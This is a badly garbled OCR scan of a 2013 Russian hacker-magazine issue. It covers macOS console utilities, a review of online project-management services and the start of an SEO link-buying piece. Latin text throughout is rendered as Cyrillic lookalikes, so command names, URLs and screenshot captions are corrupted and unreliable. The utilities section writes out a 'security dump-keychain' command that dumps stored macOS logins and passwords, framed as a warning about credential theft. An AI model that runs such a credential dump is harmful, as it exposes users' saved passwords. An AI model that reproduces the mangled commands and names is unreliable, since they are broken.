искушенные пользователи хранят список сво- 
их кастомизаций отдельным шелл-скриптом, 
который выполняется на свежеустановленной 
системе. Ярким примером такого скрипта 
можно назвать детище бельгийского фри- 
лансера Матиаса Биненса ( ЫірвѴ/дИбиЬ.согп/ 

I аьпу п еп^^ / гіоИ іі еБ/ЫоЬ/тавІег/.ОБХІ . 

РМ5ЕТ 

Ртзеі — это консольный вариант редактора 
настроек управления питанием. Он умеет вы- 
водить текущие настройки: 



АсСіѵе Ргобіез: 


Ва'С'Сегу Ромег 


-1 


АС Роме г 


-1* 



СиггепТіІу іп иве: 



5-СапсІЬусІеІау 4200 



з'СапсІЬу 


0 


мотр 


1 


Иаі-Рсііт 


1 


НіЬегпа-СебІе 


/ѵаг/ѵт/з1ееріта§е 


зтз 


1 


пе'СмогкоѵегзІеер 


0 


сіізкзіеер 


10 


зіеер 


10 


ІііЬегпа'СетосІе 


3 


’С'Сузкеерамаке 


1 


сіізріаузіеер 


10 


асмаке 


0 


Іісімаке 


1 



В список доступных пользователю настроек 
входят параметры погружения в сон при без- 
действии экрана, диска и ОС (сіізріаузіеер, 
сіізкзіеер и зіеер), пробуждение компьютера 
от сети и модема (ѵѵотр и гіпд), поведение 
при нажатии на кнопку питания (роѵѵегЬииоп) 
и открытии крышки ноутбука (Іісіѵѵаке), авто- 
матическая перезагрузка при потере питания 
(аиІогезІагО и другие. 

[безопасность! 

БЕсикітѵ 

Эта команда представляет собой не что иное, 
как консольный интерфейс к КеусНаіп (си- 



стемное приложение, хранящее различные 
пользовательские логины и пароли в Мае 05). 
Бесигііу позволяет осуществлять различные 
операции со «связкой ключей»: импортировать 
и экспортировать в файл, управлять файла- 
ми ключей, а также работать с доверенными 
сертификатами. 

Пожалуй, одна из наиболее любопытных 
функций утилиты — дамп всех ключей из хра- 
нилища. Поскольку этот момент уже подробно 
рассмотрен в одном из предыдущих номеров 
журнала, остановимся на главных моментах. 

Во-первых, если команда 

$ зесигііу сІитр-кеусИаіп -сі ~/ІіЬгагу/4-і 
КеусІіаіп5/1о§іп . кеусЬаіп 

начинает весело и задорно дампить логины 
и пароли — значит, самое время побеспоко- 
иться о сохранности твоих реквизитов. В сле- 
дующий раз дамп отправится куда-нибудь 
за пределы локалхоста. 

Во-вторых, если в диалоговом окне спра- 
шивается про доступ приложения к хранилищу 
ключей, то не будет лишним дополнительно 
пару раз перечитать текст сообщения, прежде 
чем нажать кнопку «Разрешить». 

/и$г/Ьіп/5есигі^у ргоѵісіез а соттапсі 
Ііпе іиТіег-Расе •Со асІтіпІ5Т:ег КеусЬаіпз, 
тапіриІа-Се кеуз апсі сег-Сібса-Сез, апсі сіо 
то5-С -СЫп^з -Сбе 5есигі-Су -Ргатемогк із 
сараЫе о-Р. 

БРМ 

Название «Безопасное удаление» говорит 
само за себя. 5гт позволяет перед удалением 
файла поколдовать над ним, чтобы исключить 
возможность восстановления его содержания 
специальными утилитами [например, ТезШізк). 
В арсенале команды доступны различные 
степени защиты, включающие запись в содер- 
жимое файла случайных данных и изменение 
имени файла. 




5АУ 



Данная команда использует системный синте- 
затор речи, который всегда хвалили за каче- 
ство «озвучки». Альтернативой ему из мира 
Линукс можно назвать еБреак и Резііѵаі. 

Из интересных параметров можно отме- 
тить: -о, который позволяет сохранять озвучку 
в файл (в формате АІРР), и -а для вывода звука 
на любое аудиоустройство в системе. 

Кстати, интересно, что при любом на- 
писании названия операционной системы 
синтезатор произносит ее правильно (то есть 
Мае 05 X и тасозх читаются одинаково: «Мак 
Ос Тэн»). 

$ зау -V Ргесі ’РизИ те. Апсі "СІіеп диз'С 4-* 
Іоисб те.’ -о '-/за'Сіз-РасСіоп.аі-Р 

РВСОРѴ И РВРА5ТЕ 

Эти две простые команды позволяют, как не- 
трудно догадаться из их названия, копировать 



и вставлять текст из буфера обмена. В Линук- 
се аналогичными инструментами являются 
хсіір и хзеі. С помощью рЬсору можно легко 
скопировать вывод результата работы кейгена 
команды, чтобы вставить его в текстовое поле 
001: 

$ ./кеубеп.зЬ | рЬсору 
5СРЕЕМСАРТУРЕ 

Консольный вариант снятия снимка с экра- 
на. Есть множество опций, таких как снятие 
скриншота с курсором (параметр -С), сохра- 
нение изображения в буфер обмена (пара- 
метр -с), управление форматом изображения 
параметром -I (доступны форматы: РМб, РОР, 
ЭР6, ТІРР и другие), а также управление за- 
держкой перед снятием скриншота (параметр 
-Т). Следующая команда через десять секунд 
снимет скриншот со всего экрана и отобраэит 
на скриншоте курсор: 

$ зсгеепсар-Сиге -С -Т 10 -1 зр§ 
~/Ріс'Сигез/_зсгеепзЬо'С . ір§ 

А пока у нас есть десять секунд, можно 
быстро в другой сессии терминала запустить 
команду с другими параметрами, которая в ин- 
терактивном режиме позволит выбрать окно 
и сделать его снимок без тени и характерного 
звука затвора: 

$ зсгеепсар-Ьиге --С зре -о -х -ІлІ «-« 
~/Ріс1игез/зсгеепзЬо^ . ^ре 

5ІР5 

Это такой ІтадеМадіс-Ііке комбайн изображе- 
ний, но оба инструмента схожи только в общем 
предназначении: скриптовой обработке изо- 
бражений. 5Ірз поддерживает многие функции 
ІтадеМадіск, но главное его преимущество, 
конечно, в том, что он доступен из коробки. 

С его помощью можно проводить различные 
операции, включая конвертацию, кроп и про- 
чее: 

$ зірз -3 •Рогта'С зре§ --гезатрІеМісІ'СИ 
100 рп§_ѵз_зре§.рп§ 4-і 
--оиі: рп8_ѵз_зре§.зр8 

Кстати, параметр --абсіісоп позволяет 
создать иконку-превьюшку изображения 
для Ріпбег'а. 

[заключении 

Рассмотренный список, конечно, можно про- 
должить, но это будут либо сильно узкоспеци- 
ализированные команды, либо команды очень 
обширного профиля, такие как аиіотаіог (по- 
зволяет запускать ѵѵогкЯоѵ\/-файлы одноимен- 
ного приложения) или озазсгірі (выполнение 
скриптов, написанных на АррІе5сгірі). 

В заключение еще один трюк, который 
работает в консоли 05 X: если зажать Орііоп 
и кликнуть на тексте в терминале — курсор 
встанет в это место. Удачи! □□ 
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РС20НЕ 



Илья Муравьев (іііатгѵбуа.гиі 




ПЛАНОВЫЕ 

РАБОТЫ 



ОБЗОР ОНЛАЙН-ИНСТРУМЕНТОВ 
ДЛЯ УПРАВЛЕНИЯ ПРОЕКТАМИ 




Исход дела решается не столько 
количеством человеческих 
ресурсов, сколько правильной 
организацией труда. Неважно, 
фрилансер ты или всего лишь 
звено крупной компании. 
Грамотное распределение сил 
будет одинаково полезно всем: 
и начальству, и подчиненным. 



С егодня речь будет идти о небольших 
5аа5-системах, которые позволяют 
работать с проектами онлайн. 5аа5 — 
от английского зо^іѵѵаге аз а зегѵісе — про- 
граммное обеспечение как услуга. Ты платишь 
не за продукт, а за его аренду. На самом деле это 
не только способ избежать пиратского распро- 
странения ПО, но и своеобразный «волшебный 
крючок», на котором можно выгодно держать 
клиентов, неспешно улучшая сервис и предла- 
гая вкусные бонусы (за дополнительную оплату). 

ІСУПОВЫЕ компоненты! 

у каждой отдельной системы управления свое 
видение работы с проектами. Тем не менее 
аспекты, на которые будет обращено внимание 
в обзоре, одинаково беспощадны. 

• планирование задач: работа с проектами, 
вехами, задачами; 

• управление бюджетом: зарплаты, бюджет 
проектов и прочее — все, что связано 
с финансами; 

• коммуникации: система комментирования, 
инструменты для общения между сотрудника- 
ми, е-гпаіі-уведомления; 

• отчетность и контроль за выполнением задач: 
обзор проектов, календарь, бапИ-диаграммы 
и другое; 

• документирование и работа с файлами: со- 
вместное ведение документации, создание но- 
вых документов, хранение файлов на сервере, 
функции обсуждения. 
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Плановые работы 



Старый добрый 

классический 

Вазесатр 



Мезвадез То-Ооз Саіегкіаг ѴѴгіГеЬоагсІз Рііез 



Реоріе & Реггпіззюлз ЗеагсН 



Рго)*С1 оѵегѵірѵіг 4 асПѵПу тезиае И€ж <о-:Іо Неѵ» 



>^<ѴІ<УѴ б РУ«~А« тН€8<0П<8 



ѴѴвО 

То<Іау 19 
□ Статья 2 □ 5М 



5иЫіте 
Тех! ■ 

Илья 



□ статья 3 



24 2$ 

□ Статья 4 



$іау ир ІО Оаіе оп ііііз ргоіесі 

* Тит ол етаіі ирсіаіез (о гесеіѵе 
а (іаііу (йдезС поЬ^пд уои апу 
(о-<к) іСетз ог тіІевТопез СНаТ 
ѵѵеге ас1<іе<) от сотріеіеіі іп (Не 
Іа$( (Іау. 

0 Ргоіесі А58 (ы6 Я&5?' 

Реоріе ол РИе рго^ 

$юо<ік> 

Илья 

Ѵои лгт сѵтяпРѵ ирпяО іп 



Ѵіеѵ» іЬе (иІІ са>еп(1аг 



( тоолу| 



I Обз ер I 



а Ваее еа яер (и . 



я- а -я— » ) ь 



СотріяіжІ Ьг Илья 
СотрІ«**а Ьѵ Илья 



Вазесатр 



И0Н04Г. 17 ОЕСЕИВСЯ 2012 

I Ке: Текстовые редакторы 
I Текаовые редакторы Ь 

I Программы для огранииения доступа к файловой 
системе и ОС Ь 



Р05І*а Ьу Илья 
Ас».дп«а Іо Алуоло 
АСО«Г)«а *С Алуопо 



Ьазесатр.сот 



азесатр можно назвать популярной 
и авторитетной проектной системой, 
даже в некоторой степени образцовой 
(поскольку аналогичные функционал и дизайн 
можно обнаружить и в других проектных систе- 
мах). Но, подчеркну, Вазесатр — не идеальный 
сервис с точки зрения востребованных функций, 
в некоторых моментах даже весьма противо- 
речивый. Политика разработчиков из 37зідпаІз 
незыблема и идет вразрез с пожеланиями поль- 
зователей. Вазесатр не планирует перерастать 
в функциональный комбайн, желая сохранить 
минимализм. 

Существует две версии ВС — классическая 
( Ьазесатр.сот/сІаззісІ и «новая» ( Ьазесатр. 
сот) . Классическая версия изначально вклю- 
чала в себя бесплатный план: один проект, 

10 Мб дискового пространства. Кто не успел — 



МоЫІе апд Оеякюр Арр» 




Для Вазесатр доступно около пятидесяти 
сторонних приложений 



ТОТ опоздал, сейчас для обеих версий ВС до- 
ступен только 60-дневный ІгіаІ. 

Первые шаги в Вазесатр просты до без- 
образия. Для создания проекта достаточно 
придумать имя, для добавления пользовате- 
лей в проект — указать их е-таіі-адреса, при- 
глашения для регистрации будут отправлены. 
Если проекты создаются один за другим, до- 
статочно воспользоваться шаблоном. ВС прост 
во всем, достичь цели можно за пару кликов, 
будьте создание списка заданий, предостав- 
ление прав доступа или удаление проекта. 

В проектах нет закрепленного менеджера, 
который должен контролировать качество 
выполнения заданий. Практика показывает, 
что Іо-сіо могут закрываться бездумно, для га- 
лочки, поэтому ВС получает минус балл за воз- 
можность схитрить. Дополнительная ложка 
дегтя — в Іо-сіо нельзя указать точное время 
выполнения задания, дать ему описание, 
а также назначить нескольких исполнителей. 

В проектах создаются списки задач с 1о-сіо, 
в календаре задачи можно также привязать 
к конкретному времени, создав контрольную 
точку. Кстати, как другие уважающие себя си- 
стемы управления проектами, ВС предостав- 
ляет ссылку для подписки на календарь. Бла- 
годаря этому ты можешь привязать рабочее 
расписание к боодіе Саіепсіаг с последующим 
5М5-уведомлением сотрудников о предстоя- 
щих событиях ( ІБ.осі/НдтВѴѴт] . 

Сильная сторона ВС — гибкая система 
уведомлений, на рассылку которых мож- 



но подписать сотрудников по отдельности 
или всей компанией. Причем участвовать 
в дискуссии можно дистанционно, отвечая 
на е-таіі. 

Слабая сторона — скромные средства 
для форматирования сообщений и докумен- 
тов. Поэтому написание ѵѵікі-документации 
затруднено. Если в классический ВС встроен 
сервис ѴѴгіІеЬоаг(І5, то в текущую версию сер- 
виса на замену пришли казуальные блокноты. 
Впрочем, во ѴѴгіІеЬоаг(І5 тоже были трудности 
с Техбіе-форматированием, так что замена 
шила на мыло ничего не дает. 

Если копнуть еще глубже — Вазесатр аб- 
солютно не приспособлен к бэкапу из коробки. 
В итоге ты должен обращаться к платным услу- 
гам дополнительных сервисов (Ьазесатр. сот/ 
ехігаз і для того, чтобы какой-нибудь злопы- 
хатель с правами админа по ошибке не удалил 
твой проект. Впрочем, эта проблема — общая 
для большинства рассматриваемых продуктов. 
Тебе предоставляется функциональное ядро, 
остальное — за дополнительную оплату. 

Как поменять язык в новом ВС, непонятно, 
справка об этом умалчивает. Классическая 
версия такую возможность предоставляет. 

ІРЕЗЮМЕІ 

Очень удобная и проверенная временем систе- 
ма, с умеренными ценами и упрямой политикой 
по отношению к клиентам. То есть многие по- 
лезные опции убраны или никогда не будут до- 
бавлены, поскольку нарушают концепцию ВС. 
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Театѵѵогк Рго]‘ес1 Мападег ѵѵ\л/\ѵ.Іеаппѵѵогкрт.пеі 



ажимаем кнопку «Добавить про- 
^ ект» и обращаем внимание на то, 
что при создании проекта легко от- 
ключить ненужные базовые функции, указать 
категорию, а также дату старта и финиша. 

При создании списка задач сразу же можно 
закрепить его за вехой (которую, кстати, 
позволяется создать на лету) и закрепить 
ответственного персонажа. Непосредственно 
для задач вручную можно задавать процент 
выполнения задания. Для отслеживания 
хода выполнения заданий есть тайм-трекинг. 
Фишки, которые понравились больше всего, — 
график проекта и формирование отчета в РОР. 

Для переписки предусмотрен раздел 
Меззадев, поддерживается язык размет- 
ки Магксіоѵѵп. Достаточно удобный, пусть 
и олдскульный, интерфейс для загрузки 



файлов. Для ведения документации имеется 
раздел «Записи» со стандартным ѴѴУ5ІѴѴУ6- 
функционалом. 

Интерфейс тяжеловат, его можно было 
бы разгрузить, убрав тени и постоянные под- 
грузки. Это как раз тот момент, когда не нужно 
«думать о секундах свысока». 

Дополнительные плюсы — возможность 
создания бэкапов и 551-соединение. 

Бесплатный план разрешает завести два 
проекта, под которые выдается 10 Мб про- 
странства. Привязать в бесплатном режиме 
ОгорЬох или боодіе Огіѵе к Театѵѵогк аккаунту 
не получится. Все интересное начинается 
только с тарифного плана Визіпезз 1, где в на- 
личии интеграция. 

Для перехода на русский язык нужно зайти 
в профиль и выбрать локализацию. 



Мегаплан 



ѵѵѵѵѵѵ.тедаріап.ги 



ервис «Мегаплан» умеет удивлять: 

Г проекты создаются в разделе «Зада- 
чи». Выслать приглашения сотруд- 
никам на лету нельзя, предварительно нужно 
сформировать список компании. 

Задачи ставятся в отдельном окне, где нуж- 
но прописать суть задания, указать приоритет 
и дедлайн. Причем можно обозначить точное 
время выполнения. Данная возможность 
реализована далеко не во всех 5аа5-системах. 
Есть чеклист («Добавить дело»), который 
позволяет детализировать задание. Довольно- 
таки удобно вывести список задач и подзадач 
в древовидной структуре. А вот как группиро- 
вать задания в некое подобие категорий, со- 
вершенно непонятно. Для фиксации событий, 
организации встреч и других мероприятий есть 
календарь (раздел «Дела»). К вехам он, увы, 
не имеет никакого отношения. 

Вернемся к нашим сотрудникам. Их можно 
объединить в отделы, однако для этого нужно 



переходить в раздел «Структура» из очевид- 
ного раздела «Сотрудники». И там, и там воз- 
можно добавление рабочей силы — функции 
почему-то дублируются. Забавно, что можно 
указать отношения между сотрудниками, 
как будто ты играешь в 5ітз (назовем это 
«режимом Бога»). Помимо прочего, работнику 
можно выставить должность и статус, напри- 
мер «В офисе», «Штатник». 

Вкратце о других возможностях системы. 

К преимуществам «Мегаплана» отнесем удоб- 
ный, пусть и упрощенный, учет зарплат. Можно 
создавать отчеты и просматривать план рабоче- 
го дня. Есть внутренняя почта и файлообмен. 

«Мегаплан» доступен как 5аа5, а также 
в «коробочной» версии с установкой на от- 
дельном сервере. Для каждого пользователя 
необходимо покупать отдельную лицензию, 
рассчитать стоимость можно здесь: ѵѵѵѵѵѵ. 
тедаріап.ги/саісиіа^іоп . И тут ты снова непри- 
ятно удивишься. 



ас^іѵеСоІІаЬ 



ѵѵѵѵѵѵ.асІіѵесоІІаЬ.сот 



ак и «Мегаплан», данная система до- 
||^ ступна в виде 5аа5, но также ее можно 
развернуть и на собственном сервере, 
получив полный контроль. 

Работа с асІіѵеСоІІаЬ начинается с создания 
компании и списка сотрудников, достаточно 
указать е-таіі и пару раз кликнуть. Можно до- 
бавить в проект, помимо общей информации, 
категории и метки, а также указать бюджет. 
Заходим в инвойсы, выписываем счета, смо- 
трим статистику — все интуитивно понятно. 
Приятной особенностью является система 
фильтров, которая позволяет сразу же скрыть 
ненужную информацию в панели управления. 



При работе с проектами в асІіѵеСоІІаЬ ис- 
пользуется стандартный набор инструментов: 
вехи, задачи, блокноты. Есть календарь (для 
создания задач), доступен обзор проекта и учет 
времени. 

Если даже этого тебе покажется мало, 
загляни в раздел Асітіпізігаііоп. Пожалуй, 
настройка функционала — одна из самых 
важных особенностей асІіѵеСоІІаЬ, которая 
в этом плане возвышает систему над другими 
участниками теста. 

Пакет с русскоязычной локализацией 
интерфейса можно скачать здесь: ѵѵѵѵѵѵ. 
а ■: ’ - со . 1 а □ . с о іт; о с \ѵ п о а с1 в/с а Іедогу/8 . 




РЕЗЮМЕ 

Отличная система для управления проектами 
со всем необходимым инструментарием. Отчетность, 
удобная работа с задачами и вехами, гибкая на- 
стройка прав доступа и безопасность «в коробке». 




ІРЕЗЮМЕІ 

У «Мегаплана» достойный функционал. Но после 
детального осмотра назвать его интуитивно понятной 
и удобной системой можно с большой натяжкой. Спа- 
сает то, что система русскоязычная, есть подробней- 
шая справка, в том числе скринкасты. 




РЕЗЮМЕ 

«Классическая» система управления проектами, 
весьма гибкая в настройке (особенно что касается 
разграничения прав доступа и ролей) и интуитивно 
понятная за счет четкой группировки по проектам. 
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Плановые работы 




Планфикс 



В І Планфиксе» используется трехуров- 

невая структура: проект — задача — 

I действие. Минимальная единица — 

действие. Также четвертым компонентом 
(сущностью) можно назвать аналитику (учет 
рабочего времени и прочее). Задачи могут 
существовать сами по себе независимо 
от проектов. 

При постановке задач можно требовать 
проверку результатов, причем эта опция 
активирована по умолчанию. То есть поста- 
новщик задания следит за выполнением (см. 
выше пример с Вавесатр). С другой стороны, 
в «Планфиксе» исполнитель задачи может от- 
клонить задание. В календаре ты не создашь 
веху или событие — он предназначен снова же 
для работы с задачами. 



рІапПх.ги 



В «Планфиксе» предусмотрен довольно-та- 
ки развитый тайм-трекинг. Отчеты сгруппиро- 
ваны по разным критериям и дают возмож- 
ность быстро проконтролировать рабочие 
процессы. В карточке сотрудника можешь 
указать рабочее расписание, также можно 
создавать группы сотрудников и назначать 
должности. 

Порадовал дружелюбный настрой системы: 
тебя повсюду водят за руку и подсказывают, 
куда нажимать. Поэтому адаптируешься очень 
быаро. Интерфейс хорош тем, что в нем мини- 
мум графики. 

«Планфикс» абсолютно бесплатен, 
при этом имеется служба поддержки и, 
что удивительно, гарантируется безопасность 
работы ( рІапбх.гц/весигіІу.ЫтІ ). 



РЕЗЮМЕ 

Бесплатная система управления проектами. 

Со своей внятной идеологией, всеми необходи- 
мыми возможностями, детально описанными 
в документации. 



ТеагпІаЬО^Лсе Проекты ѵѵѵѵѵѵ.1еатІаЬ.сот/ги 



родукт «Проекты» — это один из ком- 
понентов комплекса ТеатІаЬОНісе. 
Бесплатный режим сам по себе не- 
плох, почему и имеет смысл перейти с проб- 
ного периода на бесплатный: 1 Гб дискового 
пространства, до десяти пользователей. Нет 
техподдержки и офисных приложений онлайн, 
но это не остановит халявщика :). 

Регистрация — на русском языке, 
но в коротком вступительном ролике диктор 
объясняется уже на английском. Справочный 
центр также не локализован. Однако оба не- 
дочета компенсируются достаточно внятными 
инструкциями на русском языке непосред- 
ственно в разделах сервиса. 

При создании проекта нужно указать менед- 
жера, при этом можно подписаться на уведом- 
ления, если ты не являешься ответственным. 
Работа с вехами также весьма интуитивна. 

Сюда можно переместить задачу либо создать 



веху без привязки, нужно лишь выбрать про- 
ект и «бригадира». Посмотреть вехи также 
можно в календаре. В последнем при щелчке 
по ячейке можно создавать только события. 
Вообще, не очень понятно, почему ключевые 
разделы так разбросаны: для перехода в ка- 
лендарь нужно тянуться в правый верхний угол, 
для создания документов — в левый, в иных 
случаях — переходить в боковую панель. 

Кроме задач, доступны подзадачи, но нель- 
зя создавать категории, и для разбора завалов 
придется использовать фильтр. Для учета вре- 
мени предлагается запуск таймера, который 
можно прикрепить к любой задаче. Поиграть 
с секундомером всегда интересно (в единич- 
ных проблемных случаях), но, к сожалению, 
тяжелые и запущенные проекты он не спасет. 

Документооборот — сильная сторона 
ТеатІаЬОШсе, для этих целей в наличии 
удобный аналог боодіе Огіѵе. 



ОТеаіПІаЬСЖіСе АПро«гш- пробный период 43пня 



Созвать 



- А Проесть 

» иомпоФьсгы 
Отсл«мма«мы« проекты 
Діпмные 

- ^ Вехи 

Впи с моими моакоми 
БпижаііЫй* 

' В Задачи 

Моиммчи 
Ближайшие 
’ Р Обсуаиіемтя 

иоиовсѵюемия 
Поотедиме 
© учет времени 
0 Документы 
иі Отчетъ 



Отчеты 

Просроченные іет 
Ближайшие еем 

Полаэоеатепи Оеа открытых моач 

Проесты вез открыты! аеі 

проекты беі открытых ааоач 

хіктианостъ пол^зоаателя 

Затруіка 

Слисок проектоі 

Отчет о затратах іремеми 

Задачи проектоа 

Задачи пользователи 

Просроченные задачи 



РЕЗЮМЕ 

Поскольку сервис бесплатный, можно закрыть глаза 
на многие недостатки. Например, на малоинтуитив- 
ный интерфейс. Инструментарий — стандартный, 
разве что нет возможности учета финансов. 



Азапа 



абапа.сот 



омимо проектов, в Азапа предусмо- 
П трена еще одна сущность, ѵѵогкзрасе, 
для создания рабочего места с проек- 
тами и исполнителями. Впрочем, Азапа отнюдь 
не воспринимается как некая «масштабная» 
и громоздкая система управления. 

Напротив, главная особенность Азапа — 
это гибкость и скорость работы, в этом плане 
она перещеголяла не только Вазесатр, 
но и другие продукты. Проекты и вложенные 
в них задачи создаются мгновенно, так же 
быстро происходит вербовка исполнителей. 
Памятка с горячими клавишами вынесена 
на нижнюю панель. 



Увы, конкретное время для дедлайна 
не укажешь, зато показывается активность 
по каждой задаче, плюс можно быстро прикре- 
пить необходимый для работы файл, создать 
подзадачу (и под-подзадачу), опубликовать 
комментарий. 

Очень правильное решение дизайнеров — 
добавить в интерфейс третью колонку и тем 
самым разгрузить диалоги при создании новых 
сущностей. Задачи можно архивировать, дабы 
они не отвлекали внимание. 

К дополнительным возможностям можно 
отнести интеграцию с ОгорЬох. Локализации 
нет. 




РЕЗЮІЧЕ 

в Азапа нельзя работать с вехами, распределять 
финансы. По сути, функционал рассчитан на актив- 
ную работу со списками задач. Интерфейс быстрый 
и приятный. При этом Азапа бесплатна при условиях, 
что численность штата составляет до 30 сотрудников. 



ХАКЕР 02/169/2013 
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РС20ЫЕ 



ТеаппЬох 



ІеатЬох.сот 



есплатный план включает в себя 
пять проектов, 1 Гб пространства, 
пять пользователей — есть где 
развернуться! С платной подпиской эти 
ограничения снимаются плюс обещают 
«улучшенную» поддержку. Стоимость под- 
писки прямо пропорционально зависит 
от количества пользователей, из расчета 
5 долларов за душу в месяц. 

Даем название компании, затем 
создаем новый проект и включаем тайм- 
трекинг, приглашаем пользователей. 
Переходим во «Все задачи», создаем спи- 
сок. К задаче можно прикрепить сопутству- 
ющие файлы или документы боодіе. 

Учет времени доступен в виде ка- 
лендаря, где ты можешь переключаться 
между проектами, задачами и пользова- 
телями. 



Кроме того, в соседнем разделе есть 
диаграмма Ганта, которая поможет обо- 
зреть информацию по проектам с высоты 
птичьего полета. 

Работа с персоналом стандартна. Мож- 
но создавать организации, в которые будут 
входить группы сотрудников. Контакты 
при желании легко импортировать из кон- 
тактов боодіе. 

Порадовали широкие возможности 
интеграции с популярными сервисами, 
соответствующие настройки собраны 
в параметрах учетной записи («Интегриро- 
ванные службы»). Ты можешь синхрони- 
зировать с боодіе не только контакты, но 
и календарь, привязать файлохранилище 
к ОгорЬох и прочее. 

А вот интерфейс, увы, мог бы быть и бо- 
лее шустрым: многовато А^АX'а. 




резюме! 

Сервис будет интересен для бесплатного использования, 
при этом существенных ограничений в ТеатЬох нет. 
Плюсы — неплохие отчетность и интеграция со сторонни- 
ми службами. 



Теаппег 



инимализм был бы оправдан, если 
бы он направлял в правильное 
русло. Но первоначально скла- 
дывается иное ощущение — как будто 
Театег играет с тобой в прятки. «Что де- 
лать?», «Кто виноват?». Или, скажем, 
в чем разница между разделами «Задания 
для меня» и «Мои задания». 

Итак, «Что делать?». Создаем задания, 
указываем приоритет. Для того чтобы за- 
крыть задачу, нужно зайти внутрь и пере- 
ключить флажок на «Задание выполнено». 
Постановщик задания проверяет каче- 
ство выполнения и может оставить свой 



ѵѵѵѵѵѵ.іеаппег.гц 



комментарий. Календарь («Кто виноват?») 
позволяет просматривать расписание, ход 
выполнения в соответствии с дедлайном 
и прочее. «Где все?» — раздел для управ- 
ления сотрудниками. Впрочем, здесь 
ты увидишь лишь поле для ввода е-таіі, 
на который будет выслано приглашение. 
Никаких дополнительных опций нет. 

Чем больше задач, тем сложнее про- 
контролировать их выполнение. Виной 
тому отсутствие удобного календаря. Не 
хватает и инструментов для переписки или 
создания заметок внутри сервиса. Все это 
значительно усложняет работу с сервисом. 



ІеатѲІ 


Что допеть’ 


Кто в»*иовет’ Где все’ Ностройкп 
ѴРІ со данной в ЧГИОУГ я получил « 


Проект # 






Что это’ 

• мдаиио О ммггка 






Нвэмнио млания 




суть в 1 


|т«»пвг 


Сугк мдаиия ^ 


н$іюшипщ «О0ОТМО то тѵ чтобы было бостоточчо для ис 



ІРЕЗЮМЕІ 

Минимализм во всей красе. Театег не может тягаться 
с полнофункциональными системами управления. Он бу- 
дет пригоден только в небольших командах, работающих 
с очень простыми проектами. 



ѴѴогкзес^іоп 



ѵѵогквесііоп.сот 



нтерфейс заставил невольно 
^ улыбнуться: как будто встретился 
с хорошим старым знакомым. 

И действительно, уж больно обозревае- 
мый продукт похож на Вавесатр СІазвіс. 
Однако, в данном случае не так это и плохо. 
Разве что группировка разделов попарно 
(например, «Задачи и общение») кажется 
не слишком удачной идеей. 

Управление задачами достаточно 
удобное, фильтры прилагаются, однако 
Іо-сіо не удастся создать на лету. Если в ВС, 
например, есть списки задач, то здесь 
есть понятия задача — подзадача, а также 
подзадача подзадачи. Вехи, к сожалению, 
не предусмотрены. 

Понравилось то, что для каждой задачи 
можно отслеживать прогресс, основанный 



на времени выполнения задания (которое 
устанавливается вручную и на глаз). Есть 
возможность строить диаграммы Ганта 
(самый популярный способ визуализа- 
ции процесса выполнения проекта). Учет 
рабочего времени доступен во вкладке 
«Время и финансы». В календаре можно 
проконтролировать соблюдение сроков, 
посмотреть текущие события. 

Инструменты для общения не под- 
качали. В боковой панели расположен 
персональный блокнот, куда ты можешь 
записывать свои нецензурные мысли 
по поводу заданий. Кроме того, доступно 
обсуждение задач в виде комментариев. 
Чата нет. 

Напоследок стоит отметить отличную 
документацию. 





« 1 = 

- ц с 



- « 



[РЕЗЮІЧЕІ 

Украинская система управления проектами ^огкзесііоп 
представляет собой добротный агрегат, качественно собран- 
ный, по большей части из запчастей Вавесатр. 
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РС20НЕ 



Максин Черниченко 




ПЕРВОЕ ЗНАКОМСТВО С 
СЕРВИСОМ 5Е0НАММЕК 

Когда речь заходит о поисковой оптимизации, одним из первых 
пунктов в плане действий значится покупка ссылок. И это 
правильно, ведь не секрет, что бзклинкинг играет для боодіе или 
Уапсіех если не первостепенную, то явно очень серьезную роль. 

Но как выбрать площадки, ссылки с которых придадут вес твоему 
сайту в глазах поисковика и не дадут ему повода занести тебя 
в бан? Как учесть множество факторов и при всем этом не сойти 
с ума? Естественно, автоматизировать этот процесс! 



ДОНОР ДОНОРУ РОЗНЬІ 

В терминологии сеошников сайт, который 
будет ссылаться на продвигаемый ресурс, 
называется донором. Очевидно, что не любой 
сайт подойдет под эти цели. Чтобы кредит до- 
верия поисковика к домену-донору был высок, 
кроме очевидных вещей (например, домен 
должен быть не слишком молодым, недопусти- 
мо засветиться в спам-рассылках и так далее), 
он должен иметь достаточное число страниц 
в выдаче Яндекса и обладать весомым тИІД. 

Продвинутые сеошники используют также 
фильтрацию по ІІВІ, стоп-словам на странице, 
а также анализ данных внешних сервисов, ре- 
ализующих недоступный биржам ссылок функ- 
ционал, — таких как Зоіотопо, Ма]е5Ііс 5Е0, 
АЬгеІз, тогРапк, АІеха и другие. Для более 
сильного отсечения используется фильтрация 
по трафику (Ііѵеіпіегпеі, ІортаіІ) и даже иногда 
оценка донора по 5ММ-факторам (количество 
входящих лайков, комментариев, наличие 
на сайте социальных плагинов и прочее). Все 
это позволяет убрать из выдачи некачествен- 
ные доноры для покупки ссылочной массы. 



[автоматизируем процё^ 

Естественно, что вручную отследить все эти 
параметры и отсечь буллшит достаточно 
тяжело. Здесь нам помогут специальные 
сервисы, которые делают всю тяжелую 
работу за нас. Один из таких — БеоНаглтег 
( БеоЬаттег.ги) . Сервис проделывает впечат- 
ляющую работу, отсекая некачественные до- 
норы по множеству признаков. Это и «левые» 
урлы, в которых встречаются явно подозри- 
тельные слова, как вариант указывающие 
на то, что страница устарела (/агсЫѵе/2005/ 
Ьоагб, например), и количество контента (в 
нашем случае сеохаммер не пропускает стра- 
ницы, где количество знаков контента менее 
500). Само собой, в автоматическом режиме 
отсекается всякий трэш вроде порно, адалта, 
фармы, партнерок и прочих безнадежных 
с точки зрения поисковиков площадок. Это, 
кстати, реально крутая фишка, так как вряд 
ли соседство с «Епіагде уоиг репіз!!!» и «Уз- 
най тайну фамилии без регистрации и смс» 
придаст доверия твоему сайту в глазах 
Яндекса. 



Кроме всего прочего, БеоНаттег учиты- 
вает статвес страницы, да и вообще ее общую 
адекватность. Наверняка ты знаешь, что, 
например, Яндекс крайне негативно относит- 
ся к страницам, на которых есть множество 
ссылок различной тематики. Собственно, это 
то, чем становится любая активно продаю- 
щаяся ссылочная площадка через некоторое 
время. Так вот, БеоНатглег мониторит этот 
показатель и старается не размещать ссылки 
на подобных «желтых» страницах. 

ВЫВРІЫ 

Конечно, у каждого мастера есть свой метод 
оценки ссылок, и навязывать автоматизи- 
рованные сервисы сеошникус наметанным 
глазом не слишком разумно. Лично я попро- 
бовал несколько подобных тулз, и в принци- 
пе — все делают свое дело, но остановился 
